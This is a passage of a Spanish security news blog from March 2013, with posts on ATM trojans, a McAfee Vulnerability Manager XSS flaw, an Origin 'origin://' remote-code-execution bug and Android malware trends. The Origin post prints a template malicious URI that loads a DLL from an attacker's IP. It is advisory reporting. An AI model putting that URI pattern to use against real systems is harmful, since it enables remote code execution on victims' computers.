En aquel momento se intuyó que esta mejora era una gran idea y representaba el futuro del negocio, puesto que el "arte del skimming" se pensaba siempre como un acto que necesitaba un lector físico (algo casi mecánico) y el uso de tecnología SMS introducía una tecnología interesante.

Pero entonces aparecieron los troyanos para cajeros. A principios de 2009 Sophos detectó las primeras muestras en cajeros de Rusia. Lo llamaron Skimer-A.

¿Cómo hacen para operar de esta manera? Lo veremos en la siguiente entrega.

Más información:

Scammers introduce ATM skimmers with built-in SMS notification

Credit card skimming malware targeting ATMs




Sergio de los Santos
Twitter: @ssantosv

domingo, 17 de marzo de 2013

Cross-Site Scripting en McAfee Vulnerability Manager 7.5

McAfee ha publicado una alerta de seguridad para informar de una vulnerabilidad que afecta a su producto Vulnerability Manager. Esta vulnerabilidad podría permitir a un atacante remoto llevar a cabo ataques Cross-Site Scripting.

McAfee Vulnerability Manager es una herramienta de seguridad que ofrece evaluación de vulnerabilidades, pruebas de penetración, análisis de aplicaciones web y detección de dispositivos no fiables presentes en la red tales como smartphones, tablets, portátiles, e incluso dispositivos ocultos.

La vulnerabilidad que afecta a McAfee Vulnerability Manager se debe a la falta de comprobación de determinados parámetros de entrada en los componentes "Foundstone\Portal\components\vulnset.exp" y "Foundstone\Portal\include\init.inc" antes de ser devueltos al usuario, que podrían conducir a ataques Cross-Site Scripting (XSS). De esta forma un atacante remoto podría ejecutar código HTML y javaScript arbitrario en el navegador del usuario.

Se encuentran afectadas las versiones de McAfee Vulnerability Manager 7.5.x. McAfee ha publicado los siguientes hotfix para corregir el fallo, disponibles para su descarga desde la página oficial:

  • MVM 7.5.0: 7_5_0_20011_EM.zip
  • MVM 7.5.1: 7_5_1_05006_EM.zip

McAfee también informa que dicho parche estará incluido en la versión 7.5.2 que será lanzada a finales de Marzo.

Más información:

McAfee Vulnerability Manager Hotfixes available to address cross-site scripting vulnerability

McAfee Download Site


Juan José Ruiz

sábado, 16 de marzo de 2013

Ejecución remota de código en la plataforma de juegos Origin

Se ha publicado un estudio que revela la posibilidad de ejecutar código remoto a través de la plataforma de juegos Origin, afectando a más de los 40 millones de usuarios que acceden regularmente a sus juegos (como Crysis 3, Simcity, Battlefield...).

Los investigadores Luigi Auriemma y Donato Ferrante de la firma ReVuln, que ya alertaron de una vulnerabilidad similar en Steam en noviembre de 2012, han realizado el mismo análisis en la plataforma de Electronics Arts y han encontrado una vulnerabilidad equivalente. Según sus investigaciones un atacante remoto podría ejecutar código malicioso a través de enlaces origin:// especialmente manipulados.

Básicamente la plataforma Origin utiliza el siguiente protocolo para iniciar y comprobar la validez de un juego:

  • Inicio del ejecutable del juego que invoca a la plataforma Origin instalada en el sistema, mediante un URI personalizado al efecto "origin://"
  • Cierre del proceso del juego.
  • La plataforma Origin una vez hechas las comprobaciones DRM que indican que el juego es original, lo lanza a través del mismo URI inicial suministrado.




Este URI "origin://" como tal es accesible a través de cualquier acceso directo del sistema o desde el navegador, por lo que un atacante sólo tendría que incluir un URI malicioso en su página web, o en un correo y distribuirlo.

Los investigadores comentan que existen diferentes maneras de conseguir que se ejecute el código. En su comunicado se centran en la función OpenAutomate que permite iniciar un test de comprobación del sistema.

Una URI maliciosa utilizando este comando sería la siguiente:

origin:// comando /< ID del juego>?CommandParams = openautomate\\< IP
del atacante >\\ openautomate.dll

Donde ID es el identificador del juego instalado en el sistema y openautomate.dll la librería especialmente modificada que, aparte de ejecutar el juego, inicia el código malicioso desde la IP del atacante.

El ID del juego no es particular para cada usuario, por lo que es trivial incluir en una llamada un conjunto de IDs de juegos vulnerables por 'openautomate' para explotar la vulnerabilidad, aunque no se conozca a priori qué juego del catálogo mantiene el usuario instalado en su sistema.


En este vídeo se puede ver el proceso completo y la demostración de la vulnerabilidad:

Como solución temporal, se indica la posibilidad de desactivar o bloquear el protocolo "origin://" en el sistema y en el navegador, por lo que sólo se podría iniciar el juego desde la plataforma Origin directamente, hasta que se solucione la vulnerabilidad.

Más información:

EA Origin Insecurity (when local bugs go remote... again)




José Mesa Orihuela

viernes, 15 de marzo de 2013

Android, líder indiscutible del malware


F-Secure ha publicado un estudio del malware en móviles durante 2012. Android copa ya el 79% del malware para móviles, dejando el resto para iOS, Blackberry, Windows, Symbian... ¿Cómo y por qué se ha llegado a este punto?

En el informe de F-Secure las cifras son aplastantes. De 301 familias de malware para móviles estudiadas en 2012, un 79% estaban pensadas para Android.


Si atendemos al uso, en el mundo durante 2012 Android ha superado a iOS. Sin embargo la racha de aumento de malware ha sido constante y sostenida, aumentando verticalmente durante 2012. Por ejemplo en 2010, de 80 familias y variantes de malware para móviles encontradas por F-Secure, poco más del 11% estaba dedicado a Android. Por aquel entonces, Symbian se llevaba la peor parte.


Qué tipo de malware le afecta

Principalmente los que utilizan los mensajes Premium para monetizar rápidamente la infección. El sistema es infectado y permite el envío automático de mensajes a servicios Premium SMS que pertenecen a los propios atacantes (o con los que están asociados), con lo que consiguen amortizar rápidamente el programa a costa del saldo de la víctima.

Otra variante es el malware en Android como "complemento" de los troyanos bancarios. Recordemos que los bancos que utilizan los SMS como canal de autenticación son atacados de esta manera. La víctima es instada, con su equipo infectado, a descargar un APK cuando visita su banco. Este programa reenvía los SMS al número del atacante. Una vez el atacante controla los dos dispositivos (PC y móvil) puede realizar transferencias.


Ante esta pantalla, cuando el usuario pulsa algo diferente a "Android", normalmente el troyano deja de actuar, puesto que apenas disponen de programas para otras plataformas.

Otra categoría sería el malware "espía" que permite a un tercero obtener información del teléfono o de la actividad del ususario.

Existen otras variantes posibles (que quizás se popularicen en el futuro) siguiendo los pasos del malware para escritorio, como pueden ser troyanos que bloqueen el teléfono buscando un rescate o que muestran publicidad.

Cómo llega el malware al teléfono

Principalmente, con el concepto de "troyano" tradicional. La víctima descarga lo que cree un programa inocente de Google Play, pero que en realidad resulta ser malware. Puede también ofrecer la funcionalidad prometida, pero no es relevante.

Esta es la vía fundamental. Pero como es de esperar, el mundo móvil debe imitar a la larga al escritorio. En mayo de 2012 se encontró por primera vez malware "drive by download" para Android. Esto significa que la víctima se infectaba navegando con su teléfono, como ocurre habitualmente en el escritorio. En este caso no aprovechaba ninguna vulnerabilidad del navegador, sino que si la página era visitada con Android, aparecía un mensaje pidiendo descargar una aplicación.

¿Por qué Android?

Varios factores se han dado para que este sistema operativo se esté convirtiendo en objetivo principal del malware. Si comenzamos por los descartes, Symbian, Blackberry y Windows por ahora son poco usados y por tanto poco atractivos. Entre iOS y Android, la apuesta de los atacantes está clara: Android no requiere que sus aplicaciones estén firmadas como iOS. Esto aleja el malware de iOS.

Por otro lado, la vía principal de infección, la Store (a pesar de los esfuerzos de Google), no exige demasiado a los desarrolladores ni a las propias aplicaciones, mientras que Apple resulta mucho más estricta.

Más información:

MOBILE THREAT REPORT Q4 2012



Sergio de los Santos
Twitter: @ssantosv